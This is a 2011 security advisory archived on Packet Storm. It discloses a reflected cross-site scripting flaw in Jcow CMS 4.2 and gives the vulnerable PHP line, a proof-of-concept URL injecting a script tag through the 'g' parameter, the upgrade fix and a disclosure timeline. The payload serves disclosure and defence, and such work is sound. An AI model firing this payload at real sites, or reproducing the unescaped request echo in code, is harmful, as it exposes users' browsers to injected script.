exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Jcow CMS 4.2 Cross Site Scripting

Jcow CMS 4.2 Cross Site Scripting
Posted Aug 26, 2011
Authored by Aung Khant | Site yehg.net

Jcow CMS version 4.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | e38d842b5d074b78cd8472b0be60fe3e5dff9c86f251b915e8f9858ab00a7533
Download | Favorite | View

Jcow CMS 4.2 Cross Site Scripting

Change Mirror Download
Jcow CMS 4.2 <= | Cross Site Scripting


1. OVERVIEW

Jcow CMS 4.2 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Jcow is a flexible Social Networking software written in PHP. It can
help you to build a social network for your interests and passions, a
member community for your existing website and a social networking
site like facebook/myspace/twitter.


3. VULNERABILITY DESCRIPTION

The parameter "g" is not properly sanitized upon submission to
/index.php, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Jcow CMS 4.2 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

File  : /includes/libs/member.module.php:
Line 605: <input type="hidden" name="g" value="'.$_REQUEST['g'].'" />

http://[target]/index.php?p=member/signup&email=&username=&password=&fullname=&birthyear=1991&birthmonth=01&birthday=01&gender=0&location=Myanmar++&about_me=&recaptcha_challenge_field=03AHJ_Vuvk8U6zCeSdrjB0GPDuwaRP-tPJ2G7u3Nm5LpmVSGmZs_CIP9I_C0PYZ1zYY6F42zpzGKQkxSiUhhyu-QhhwZA6oTlLNntgAgmRkDjfZpu3j4-bMeQNpOVh1afb4fZ4qwaIxHpP1wL8-8-LgkEBE5auAFmF_w&recaptcha_response_field=&g=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E&onpost=1&agree_rules=1


6. SOLUTION

Upgrade to 4.3.1 or higher.
The commercial version 5.x.x is not vulnerable.


7. VENDOR

Jcow CMS Development Team
http://www.jcow.net


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-06-03: notified vendor
2010-06-03: vendor replied fix would be available within 48hrs
2011-08-24: vendor released fixed version, jcow.4.3.1.ce
2011-08-26: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[jcow_4.2]_cross_site_scripting
Jcow CMS: http://sourceforge.net/projects/jcow/files/jcow4/jcow.4.2.1.zip/download


#yehg [2011-08-26]


---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close